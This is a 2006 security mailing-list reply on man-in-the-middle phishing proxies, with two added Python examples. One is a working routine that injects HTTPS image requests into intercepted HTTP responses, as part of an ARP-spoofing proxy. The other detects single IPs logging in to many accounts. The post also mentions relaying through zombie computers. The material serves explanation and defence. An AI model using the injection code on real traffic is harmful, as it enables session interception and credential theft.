WebApp Sec mailing list archives
Re: Mitm new?
From: Rogan Dawes <discard () dawes za net>
Date: Thu, 17 Aug 2006 10:32:34 +0200
Jeff Robertson wrote:
Why are man-in-the-middle phishing sites suddenly talked about as a "new" threat, as if there was rocket science involved? For instance
http://blog.washingtonpost.com/securityfix/2006/07/citibank_phish_spoofs_2factor_1.html
These things are basically proxies, which are as old as the web. Why does it surprise anyone to see these combined with phishing? (Then again, I still haven't figured out why phishing as we know it didn't "take off" circa 1994)

Jeff Robertson
Yeah, there is nothing special about this. At the time of the IE HTTPS Certificate attack (http://security.e-matters.de/advisories/012001.html), I used a transparent (arp-spoofing) MITM proxy to insert image requests for an SSL page from the target into non-SSL pages that passed through my proxy. After that, any subsequent requests for the targeted secure pages (even via bookmark, etc.) passed through my proxy, and I could record/alter, etc. any fields that I wanted to.
I guess one of the deterrents to using this technique is that the source of all the connections would appear to come from a single IP. Of course, it would not be too difficult to relay the connections via one or more zombie computers, exactly as they do currently to harvest credentials. This could introduce a lot of latency, which a user MIGHT notice.
Rogan
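The response-rewriting step described in the first paragraph of Rogan's reply, as an added Python example (this is not his proxy code and not part of the original thread): a captured plain-HTTP response has an image reference to the HTTPS host appended before `</body>`, with Content-Length corrected so the browser accepts the altered page. The host `bank.example` and the image path are hypothetical, and the ARP spoofing and socket plumbing of the transparent proxy are not shown; only the rewrite that would sit in its response path is.

```python
"""
Rewrite a captured non-SSL HTTP response so that the browser also fetches
an image over HTTPS from a chosen host.  Added example, not the poster's code.
The target URL passed by the caller (e.g. https://bank.example/img.gif) is
hypothetical.
"""


def split_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header terminator in response")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def inject_image(raw: bytes, image_url: str) -> bytes:
    """Return the response with an <img> for image_url inserted before </body>.

    Only uncompressed, non-chunked text/html responses are touched; rewriting
    a gzip or chunked body in place would corrupt it and the browser would
    show an error instead of the page, which is the last thing a MITM wants.
    """
    status, headers, body = split_response(raw)
    hdrs = {name.lower(): value for name, value in headers}
    if not hdrs.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw
    if hdrs.get(b"content-encoding") or b"chunked" in hdrs.get(b"transfer-encoding", b"").lower():
        return raw

    tag = b'<img src="%s" width="1" height="1" alt="">' % image_url.encode("ascii")
    # bytes.lower() only changes ASCII letters, so offsets match the original body.
    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + tag + body[idx:] if idx >= 0 else body + tag

    new_headers = []
    for name, value in headers:
        if name.lower() == b"content-length":
            value = str(len(new_body)).encode("ascii")
        new_headers.append((name, value))
    head = b"\r\n".join([status] + [n + b": " + v for n, v in new_headers])
    return head + b"\r\n\r\n" + new_body


if __name__ == "__main__":
    # Constructed sample response, not captured traffic.
    sample = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
              b"Content-Length: 28\r\n\r\n<html><body>hi</body></html>")
    print(inject_image(sample, "https://bank.example/img.gif").decode())
```

The function deliberately leaves compressed and chunked responses alone; a real proxy would either decompress and re-chunk or strip `Accept-Encoding` from the request on the way out so that the server never compresses in the first place.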
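The "single IP" tell from the second paragraph, turned into a server-side check as an added Python example (not part of the original thread): it counts how many distinct accounts each client address successfully logs in as and flags addresses past a threshold, with an allowlist for known shared egress points such as corporate NAT. The log line format and the sample lines are constructed for the example.

```python
"""
Flag client addresses that log in as unusually many distinct accounts,
which is what a single MITM proxy relaying victims' sessions looks like
from the target site.  Added example; log format and samples are constructed.
"""
import re
from collections import defaultdict

# Hypothetical format: "<timestamp> <client_ip> login <user> <ok|fail>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) login (?P<user>\S+) (?P<result>ok|fail)$")

SAMPLE_LOG = """\
2006-08-17T10:00:01Z 198.51.100.23 login alice ok
2006-08-17T10:00:07Z 198.51.100.23 login bob ok
2006-08-17T10:00:12Z 203.0.113.9 login carol ok
2006-08-17T10:00:40Z 198.51.100.23 login dave fail
2006-08-17T10:00:41Z 198.51.100.23 login dave ok
2006-08-17T10:01:03Z 198.51.100.23 login erin ok
2006-08-17T10:01:30Z 203.0.113.9 login carol ok
2006-08-17T10:02:15Z 192.0.2.77 login frank ok
this line is malformed and is skipped
""".splitlines()


def accounts_by_source(lines):
    """Map each client IP to the set of accounts it logged in to successfully."""
    seen = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["result"] != "ok":
            continue  # failed attempts and unparseable lines do not count
        seen[m["ip"]].add(m["user"])
    return seen


def shared_source_ips(lines, min_accounts=3, allowlist=frozenset()):
    """Return {ip: sorted accounts} for addresses at or above the threshold
    that are not in the allowlist of known shared egress points."""
    return {
        ip: sorted(users)
        for ip, users in accounts_by_source(lines).items()
        if len(users) >= min_accounts and ip not in allowlist
    }


if __name__ == "__main__":
    for ip, users in shared_source_ips(SAMPLE_LOG).items():
        print(f"{ip}: {len(users)} accounts ({', '.join(users)})")
```

As the post notes, relaying through several compromised hosts spreads the logins over many addresses and defeats a plain per-IP count; the threshold then has to be set per site from normal NAT behaviour, and the remaining signals are the extra latency the user might notice and a per-account check for logins from an address the account has never used.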
Current thread:
- Mitm new? Jeff Robertson (Aug 16)
- Re: Mitm new? Rogan Dawes (Aug 18)
- Re: Mitm new? mikeiscool (Aug 18)
- Re: Mitm new? Nick Owen (Aug 18)
- <Possible follow-ups>
- Re: Mitm new? ROB DIXON (Aug 18)